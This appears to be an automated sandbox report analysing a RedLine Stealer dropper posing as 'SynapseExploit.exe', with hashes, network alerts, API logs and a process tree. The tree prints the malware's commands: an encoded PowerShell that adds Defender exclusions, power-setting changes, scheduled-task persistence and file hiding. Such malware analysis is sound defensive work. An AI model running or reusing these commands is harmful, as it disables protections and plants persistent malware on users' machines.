Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 11, 2023, 7:15 p.m.	Dec. 11, 2023, 7:29 p.m.

Size	1.1MB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`2cd9b5d48c0904c90537d3eb0f1becad`
SHA256	`b3ebb5a8630417d858f873711178365a1cc015e4a9952c9dfbb17550b3210053`
CRC32	`DA421B30`
ssdeep	`12288:JsSzartxSD/6+s8RPJsw9/r59yJUGaH881u4bT+txTanMwCxhFO5nG/sE:hzartxSD/6+sXsF9ygvbnMhxhgn5E`
PDB Path	C:\2fz0o3pfqrab46\Util.pdb
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

SynapseExploit.exe "C:\Users\test22\AppData\Local\Temp\SynapseExploit.exe"
1000
- AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2116
  - conhost.exe "C:\Users\test22\AppData\Local\Temp\conhost.exe"
    2896
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\temp\main.bat" /S"
      3016
      - mode.com mode 65,10
        2064
      - 7z.exe 7z.exe e file.zip -p32606511521849235062050926056 -oextracted
        2144
      - 7z.exe 7z.exe e extracted/file_9.zip -oextracted
        2216
      - 7z.exe 7z.exe e extracted/file_8.zip -oextracted
        1156
      - 7z.exe 7z.exe e extracted/file_7.zip -oextracted
        2324
      - 7z.exe 7z.exe e extracted/file_6.zip -oextracted
        2632
      - 7z.exe 7z.exe e extracted/file_5.zip -oextracted
        2788
      - 7z.exe 7z.exe e extracted/file_4.zip -oextracted
        2800
      - 7z.exe 7z.exe e extracted/file_3.zip -oextracted
        1508
      - 7z.exe 7z.exe e extracted/file_2.zip -oextracted
        1752
      - 7z.exe 7z.exe e extracted/file_1.zip -oextracted
        2848
      - attrib.exe attrib +H "Installer.exe"
        2984
      - Installer.exe "Installer.exe"
        1340
        
        cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        2188
        
        powershell.exe powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA=="
        2292
        
        powercfg.exe powercfg /x -hibernate-timeout-ac 0
        2576
        
        powercfg.exe powercfg /x -hibernate-timeout-dc 0
        2628
        
        powercfg.exe powercfg /x -standby-timeout-ac 0
        1552
        
        powercfg.exe powercfg /x -standby-timeout-dc 0
        2908
        
        powercfg.exe powercfg /hibernate off
        2944
        
        cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2172
        
        schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2780
        
        cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2840
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2676
  - svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
    2940

Name	Response	Post-Analysis Lookup
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	104.20.68.143
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	104.26.12.31

IP Address	Status	Action
104.20.67.143	Active	Moloch
104.26.13.31	Active	Moloch
164.124.101.2	Active	Moloch
195.20.16.153	Active	Moloch
45.15.156.167	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 45.15.156.167:80	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 45.15.156.167:80	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 45.15.156.167:80	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 45.15.156.167:80 -> 192.168.56.103:49165	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 45.15.156.167:80	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 104.26.13.31:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49207 -> 195.20.16.153:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 195.20.16.153:80 -> 192.168.56.103:49207	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 195.20.16.153:80 -> 192.168.56.103:49207	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 195.20.16.153:80 -> 192.168.56.103:49207	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 45.15.156.167:80	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49169 -> 195.20.16.153:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 195.20.16.153:80 -> 192.168.56.103:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 195.20.16.153:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 195.20.16.153:80 -> 192.168.56.103:49169	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49207 -> 195.20.16.153:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 195.20.16.153:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.103:49169 -> 195.20.16.153:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 195.20.16.153:80	2016696	ET HUNTING Suspicious svchost.exe in URI - Possible Process Dump/Trojan Download	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 45.15.156.167:80	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49200 -> 104.20.67.143:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 195.20.16.153:80 -> 192.168.56.103:49208	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 195.20.16.153:80 -> 192.168.56.103:49208	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 195.20.16.153:80 -> 192.168.56.103:49208	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49166 104.26.13.31:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	53:56:0b:3a:91:49:7f:18:59:87:21:98:d3:7f:98:0b:b4:ae:cb:cc
TLS 1.2 192.168.56.103:49200 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f

Queries for the computername (23 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (11 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 11, 2023, 7:15 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:15 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0

Command line console output was observed (18 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Roaming\temp> console_handle: 0x0000000000000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: cls console_handle: 0x0000000000000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x000000000000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 1 file(s) moved. console_handle: 0x0000000000000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: Launched 'Installer.exe'. console_handle: 0x0000000000000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: Press any key to continue . . . console_handle: 0x0000000000000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: At line:1 char:30 console_handle: 0x00000047	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: + <#HnNGcU2a#> Add-MpPreference <<<< <#tc0Y#> -ExclusionPath @($env:UserProfil console_handle: 0x00000053	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: e,$env:SystemDrive) <#61#> -Force <#t6Cs#> console_handle: 0x0000005f	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: Hibernation failed with the following error: The request is not supported. The following items are preventing hibernation on this system. The system firmware does not support hibernation. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: SUCCESS: The scheduled task "NvStray\NvStrayService_bk5665" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: SUCCESS: The scheduled task "dllhost" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 63 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7210 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7210 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7210 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7210 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7210 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c7ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x08be26a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x08be26a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x08be2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8340 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b7c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b7c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b7c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b7c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b7c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b7c80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 11, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b87c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

C:\2fz0o3pfqrab46\Util.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 11, 2023, 7:15 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.css5
section	.00cfg

The executable uses a known packer (1 event)

packer

Microsoft Visual C++ V8.0 (Debug)

One or more processes crashed (50 out of 65551 events)

Time & API	Arguments	Status
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x74c57d 0x74c34e 0x746b43 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74c6b8 registers.esp: 2550112 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2550176 registers.edx: 4848280 registers.ebx: 2551364 registers.esi: 39013300 registers.ecx: 0	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94fa0e0 0x94f9b91 0x94f9aad 0x94f8b40 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548692 registers.edi: 2548976 registers.eax: 0 registers.ebp: 2548700 registers.edx: 0 registers.ebx: 2551364 registers.esi: 43774032 registers.ecx: 39099488	1
